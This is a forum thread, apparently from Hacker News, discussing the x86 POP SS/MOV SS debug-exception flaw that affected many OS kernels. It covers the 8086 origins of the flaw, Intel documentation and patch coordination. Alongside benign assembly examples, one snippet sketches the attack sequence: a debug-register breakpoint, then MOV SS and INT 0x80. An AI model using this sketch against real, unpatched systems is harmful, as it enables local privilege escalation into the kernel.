> Somewhere around the release of the 8086, Intel decided to add a special caveat to instructions loading the SS register...where loading SS with [`pop ss` or `move ss`] would force the processor to disable external interrupts, NMIs, and pending debug exceptions.
So it's a really, really old piece of documentation, dating from around 1980.
To call it a 'misinterpretation' rather than a vulnerability is extremely generous, given that most Intel engineers spent entire careers in the presence of code vulnerable to this 'misinterpretation' without calling the OS vendors out on their error.
Agreed, but that's just saying that combining two or more simple things results in a more complex thing. All platforms I know of describe each individual instruction and its consequences, and leave you to deduce the consequences of combining them.
They were clear in 2006 when I was reading them. All the emulator implementors were very aware of it. Many old operating systems won't boot without the delay.
I'm trying to understand this one, even if most of my ASM knowledge is from the 8086 era. My guess:
* When an interrupt, debug exception, ... occurs, the CPU pushes stuff onto the stack as part of transferring control to the handler.
* The stack is managed by 2 registers: SS and (e/r)SP. To change your stack, you have to change both registers. If an interrupt happens and you've changed only 1, stuff gets pushed on an invalid stack and you're toast.
* To fix this, the CPU has a wild card: When you change SS, you get exactly 1 instruction that will not be interrupted. The idea is you use that instruction to change (e/r)SP and make the stack valid again. If there is a need for an interrupt, it will be delayed for 1 instruction.
* Now, here's the security problem: what happens if you use that second instruction to switch to kernel mode instead? It turns out the delayed interrupt is delivered before the first kernel-mode instruction, but already inside the kernel.
* And you can trigger the right kind of interrupt with debug exceptions and single stepping.
* And if you do this, the kernel tells the debugger not about the debugged program but about the kernel. Oops.
So to fix this, I suppose the kernel checks the debug exception info from the CPU, and if it is debugging the kernel it fixes things up so you go back 1 instruction.
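In NASM-style 16-bit assembly, the intended use of that one-instruction grace period looks like this (segment and offset values are illustrative):

```nasm
; Switching stacks on the 8086: an interrupt between these two
; instructions would push FLAGS/CS/IP onto a half-switched stack.
mov ax, 0x2000
mov ss, ax        ; loading SS inhibits interrupts for ONE instruction...
mov sp, 0xFFFE    ; ...so the stack pointer is fixed up before any
                  ; pending event can be delivered
```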
> To fix this, the CPU has a wild card: When you change SS, you get exactly 1 instruction that will not be interrupted. The idea is you use that instruction to change (e/r)SP and make the stack valid again. If there is a need for an interrupt, it will be delayed for 1 instruction.
I wonder, why couldn't they make a single instruction that changes both SS and SP?
There is one. LSS SP, value exists on the i386 and later, and there is also the task state segment, which might help. But this was a hack in the original 8086, which wasn't the best processor design ever to start with. It stays around because of backward compatibility.
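For reference, the single-instruction variant on the i386 and later; the far-pointer layout (offset first, then selector) follows the SDM, and the labels are illustrative:

```nasm
new_stack:
    dd stack_top       ; 32-bit offset that will go into ESP
    dw stack_selector  ; 16-bit selector that will go into SS

    lss esp, [new_stack]  ; loads SS:ESP in one instruction, so no
                          ; inhibit window is needed at all
```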
They could, but attackers would still use the approach that works for them.
And they can’t really remove the old instructions because of backwards compatibility.
Whitelisting a limited set of instructions that can follow setting SS and making all others trap might be an option, though. It still would break backwards compatibility, but if the effective impact would be negligible, they could deem it acceptable.
“Loading the SS register with a POP instruction suppresses or inhibits some debug exceptions and inhibits interrupts on the following instruction boundary. (The inhibition ends after delivery of an exception or the execution of the next instruction.) This behavior allows a stack pointer to be loaded into the ESP register with the next instruction (POP ESP) before an event can be delivered. See Section 6.8.3, “Masking Exceptions and Interrupts When Switching Stacks,” in Intel® 64 and IA-32 Architectures Software Developer’s Manual, Volume 3A. Intel recommends that software use the LSS instruction to load the SS register and ESP together.”
I bet whitelisting only instructions that can change SP/ESP would not break the majority of x86 code. All other instructions would behave as if MOV SS had not been executed.
`sti` will hold off on enabling interrupts until right after the `hlt` has started, so that you don't end up in a race condition where an interrupt arrives between `sti` and `hlt`.
Granted, they could have made an `stiandhlt` instruction here as well.
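The idiom being discussed, for reference:

```nasm
; Safe idle loop: STI enables interrupts only after the NEXT
; instruction boundary, so nothing can slip in between STI and HLT.
idle:
    sti
    hlt           ; sleeps; the next interrupt wakes the CPU
    jmp idle

; Without that guarantee, an interrupt could be delivered right
; after STI, get handled, and HLT would then go to sleep even
; though the handler had just queued up new work.
```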
A trace exception shouldn't be creating work for a thread context that's ostensibly the one going to sleep with nothing to do, but an external interrupt very likely is.
In protected mode, SS holds a selector that indexes into the GDT. It doesn’t make sense to change SS very often unless there are multiple stacks. Furthermore, it doesn’t make sense to overcomplicate an already over-complicated instruction set burdened with vestigial, legacy features. And loading SS and SP atomically would probably create a byte pattern that’s too long to encode.
You could, but it wouldn't allow them to relax the constraints here, since you'd have to recompile all the code in the world to use this new instruction before relaxing.
The cost would not have been very big. The 8086 had microcode, and there were the very similar LDS and LES instructions. There were plenty of unused slots in the opcode table, so that wasn't the reason either. There are weird instructions aplenty like XLAT or AAA/AAS/AAD/AAM, so it wasn't as if they had a pressing silicon shortage.
Maybe they didn't think about it, and fixed it with a quick hack once they became aware of the problem? The whole segment-register story was very hacky from the start.
Intel might have dumped the segment registers in i386 32 bit protected mode, as they cleaned up a lot of other troublesome corners around that time. But, well, they didn't, so we have to deal with it today.
The fun thing is the 286 didn't fix this either. This is why the MOV SS has to come first (in protected mode, for example, the selector's segment may not be present). This was a problem for DOS, where SS was often used to access the DOS data segment.
Adding an interrupt delay is also not free and requires changes at the hardware level. But if it was done in the '80s, then of course it was a safe hack, because there was no kernel/user-mode isolation at that time.
* There's an old feature which causes POP SS/MOV SS instructions to delay all interrupts until the next instruction has executed, to safely allow changing both SS and SP without an interrupt firing inbetween on a bad stack.
* If such an instruction itself causes an interrupt (by triggering a memory breakpoint through the debug registers), it is delayed (as intended).
* The delayed interrupt will fire after the second instruction even if the second instruction disabled interrupts.
* By means of the above, a MOV SS instruction triggering a #DB followed by an INT n instruction will cause the #DB exception to fire before the first instruction of the interrupt handler, even though this should be impossible (as entering the handlers sets IF=0, disabling interrupts).
* The OS #DB handler assumes GS has been fixed up by the previous interrupt handler, which is now under user control.
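Put together, the attack is only a couple of instructions (a sketch based on the description above; `ss_val` is a hypothetical user-space variable on which a data breakpoint has been armed beforehand via the debug registers):

```nasm
; DR0 points at ss_val, set up as a read/write breakpoint
mov ss, [ss_val]  ; touches the watched address -> #DB, but MOV SS
                  ; inhibits its delivery for one instruction
int 0x80          ; the pending #DB now fires at the first instruction
                  ; of the kernel's interrupt handler, where the kernel
                  ; assumes GS etc. have already been fixed up
```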
The x86 ISA and its implementations are now in the spotlight of the whole security research community. There is probably a lot more to come since it accumulated a lot of cruft in the name of backwards compatibility.
I hope we learn a lot, and take the time to record the experience, for coming platforms like RISC-V and others.
Why is there no big CAVEATS document from Intel detailing weird quirks? I strongly assume the Intel arch engineers are well aware of many of those counter-intuitive behaviours in their products.
> I strongly assume the intel arch engineers are well aware of many of those counter-intuitive behaviours in their products.
But it is likely just kind of distributed, organic knowledge that is hard to condense into a single document. Writing and maintaining such a thing would be a significant project, and (I am speculating here) not the kind of thing that significantly burnishes anyone's performance review.
That said, the whole community of assembly-hackers has even broader knowledge of the topic, and could start such a document out in the open. And Intel engineers might likely contribute their own two cents. (Unless lawyers forbid it).
Wow, the article shows that many vendors mis-read the docs: Apple, Microsoft, FreeBSD, Red Hat, Ubuntu, SUSE Linux, and other Linux distros...as well as VMware and Xen.
At that point can it really be attributed to "mis-reading" the docs? If every single independent implementor understood it the same way, the docs were wrong.
To be fair, Intel docs are so consistently gibberish that they might as well be classified as a separate language (similar to English, but with only a quarter of the information density).
In this case it seems they just didn't properly specify a piece of insane behaviour though. Hell, I'd consider it an outright CPU bug if I'm reading this right. Seemingly there's a "feature" where loading SS causes interrupts to be delayed until after the next instruction, even if the next instruction disables interrupts - so you can cause an interrupt to fire on the first instruction of the handler (where it should be impossible).
1. The CPU reads past the end of the I/O permission bitmap used to check instructions like `in` and `out`. Every OS which supports the feature has to add an extra 0xFF byte beyond the end of the bitmap.
2. Returning from a 32-bit OS to a 16-bit process will only update the low 16 bits of the stack pointer. The upper 16 bits can still be read, leaking info about the kernel stack. Linux has a complicated work-around called espfix.
I have no doubt that the complexity adds to the difficulty of documenting it. But, I still think the documentation is failing when people across the industry who should be able to parse this complexity are unable to. Complexity just isn't an excuse for broadly misunderstood documentation in my opinion.
> Apple, Microsoft, FreeBSD, Red Hat, Ubuntu, SUSE Linux, and other Linux distros.
Just to clarify, this is kernel code. Listing 3 different (+ "other") Linux distros as affected is kinda bogus, it's not that they all made the same mistake, they just all use the same kernel.
As an example, Red Hat doesn’t ship major kernel upgrades except with major releases. If you’re running RHEL 6, you’re still on a 2.6 kernel and the fact that someone patched 4.x probably doesn’t help you all that much unless you have the time to backport the change and confirm that it doesn’t break something else.
Not just Germany, a very large chunk of Europe has a holiday today. Belgium, France, Netherlands, Portugal, the Nordics and Switzerland I'm sure about, there may be others.
I wonder what happens if you execute multiple POP SS instructions. In fact, you could set up a 64K v86 mode segment containing only copies of the POP SS instruction. jmp far into it. When IP reaches the last instruction it wraps around and starts again. Will it ever be interrupted by anything? If the stack usage bothers it, just do MOV SS,AX
“If a sequence of consecutive instructions each loads the SS register (using MOV or POP), only the first is guaranteed to inhibit or suppress events in this way.”
So, we still don’t know. For all I know, it may even depend on the exact CPU used or the CPU state.
> Fixing the bug and having synchronized patches out by yesterday was an industry-wide effort, one that deserves praises, compared to the jumbled Meltdown and Spectre patching process.
Is this a fair comparison? I feel like the patching techniques must have been easier to develop than for Meltdown/Spectre. Furthermore, since this affected the same kind of people in this community, maybe this time around benefited from the communication channels established during the previous exercises.
Maybe this comparison isn't trying to badmouth the previous iteration, but rather to show a general improvement in the industry; I just find it a bit unfair.
This is one of the first times that I know of that the Linux kernel and Windows kernel developers discussed a security issue together directly. So while the fix was much simpler than for Meltdown/Spectre (Linux was fixed with a patch originally written in 2015), the communication between different OS kernel developers right now is very good.
And yes, it is all due to the horrible Meltdown/Spectre problem and how that was handled. We were not allowed to work together for that problem, and we do not want that to happen again.
There isn't one BSD kernel like there is one Linux kernel, there are several different ones which might borrow from each other, but are developed independently. A comparison can be found on Wikipedia: https://en.wikipedia.org/wiki/Comparison_of_operating_system...
And furthermore, the current stack address is determined by the combination of two registers: ss for the segment and rsp/esp/sp for the stack pointer within the segment. I guess the strange behavior around modifying ss comes from the fact that you need to also modify sp immediately afterwards, because otherwise you are running with a wild stack address pointing to random memory. You also can't modify sp before modifying ss because then you are also running with a wild stack, and an interrupt could come in at any time and push things onto random memory.
The vulnerability notes[1] say Apple patched this on May 8, but my last security update was May 3 and I don't currently show any available updates... I wonder if the May 3 patch fixed this, or if my computer might not be affected.
HardenedBSD would just receive it downstream from OpenBSD, wouldn't it? It's like contacting the Linux Mint group while contacting Ubuntu is sufficient.
HardenedBSD is a separate OS forked from FreeBSD with its own kernel development. While the BSDs may share some code, they're essentially all different OSes. There is no single upstream like Linux has.
As a side note: after Spectre/Meltdown, Shawn Webb complained in a NYCBUG thread about not being able to get access to these embargoed vulnerabilities.
A bit tangentially related, but I've always wondered why the syscall instruction doesn't use the TSS for stack switching like int does. I guess it does give you more flexibility to load rsp from gs during a cpl 3 -> cpl 0 transition rather than consulting the TSS to switch it automatically. Can anyone weigh in on this?
Can someone explain the risk factor? It cannot be exploited remotely or through a browser, if I'm reading it right. But a malicious program with user-level access can gain kernel access. So the exposure is that malware running on a limited account can escalate to higher access?
I'm sure the initial reaction here is going to be lamentation about the state of documentation. People will correctly point out that, if multiple entities misread the documentation, it must have been unclear. And they are right. But that doesn't make this Intel's fault alone. Clear or unclear, the documentation described behavior that was understood within the Intel organization, and the shipped product worked as described.
Where was the security testing at the OS level? Why can't there be automated test suites that catch unauthorized access issues before ship (if not before merge commit)? If your vendor delivers an insecure product and you don't discover it, how much blame do you share?
Concolic testing would probably catch it, but only if the person that implemented the hardware model for the theorem prover understood the Intel documentation, which seems unlikely.
Basic fuzzing probably wouldn’t catch this; as the other comments point out, the search space is probably too large, and the set of vulnerable executions is probably too small for an undirected random search.
I’d be truly amazed if a fuzzer could have caught this one. You need to invoke debug syscalls with the right parameters and the do a magic two-to-three instruction sequence.
If you can't trust the CPU documentation, how can you test that addition works? Even if you could test all possible combinations of terms to add and verify the results, there may be a hidden flag somewhere that, when flipped, changes how addition works.
On that subject, I'm curious whether there is any CPU out there that sets the overflow flag incorrectly when computing (-1) - n when n is the most negative number (which negates to itself, so implementing subtraction by simply negating the RHS and adding will screw up the flags).
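For the curious, here is that case spelled out in 32-bit terms (NASM syntax; the flag results follow the x86 rules for SUB):

```nasm
mov eax, -1           ; 0xFFFFFFFF
sub eax, 0x80000000   ; -1 - INT_MIN = INT_MAX (0x7FFFFFFF), OF = 0

; A naive "negate the RHS and add" implementation goes wrong here:
; NEG of 0x80000000 yields 0x80000000 again (it negates to itself),
; and 0xFFFFFFFF + 0x80000000 = 0x7FFFFFFF is negative + negative
; with a positive result, so that path would incorrectly set OF = 1.
```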
The ARM ARM documents sub(left, right, no carry) as add(left, ~right, carry set), which is also the most straightforward implementation if you have to account for carry anyway.
Your idea is akin to searching the space of unknown unknowns. By definition, you cannot even begin to quantify the space of what you don't know you don't know.
https://everdox.net/popss.pdf
the researcher wrote:
> Somewhere around the release of the 8086, Intel decided to add a special caveat to instructions loading the SS register...where loading SS with [`pop ss` or `move ss`] would force the processor to disable external interrupts, NMIs, and pending debug exceptions.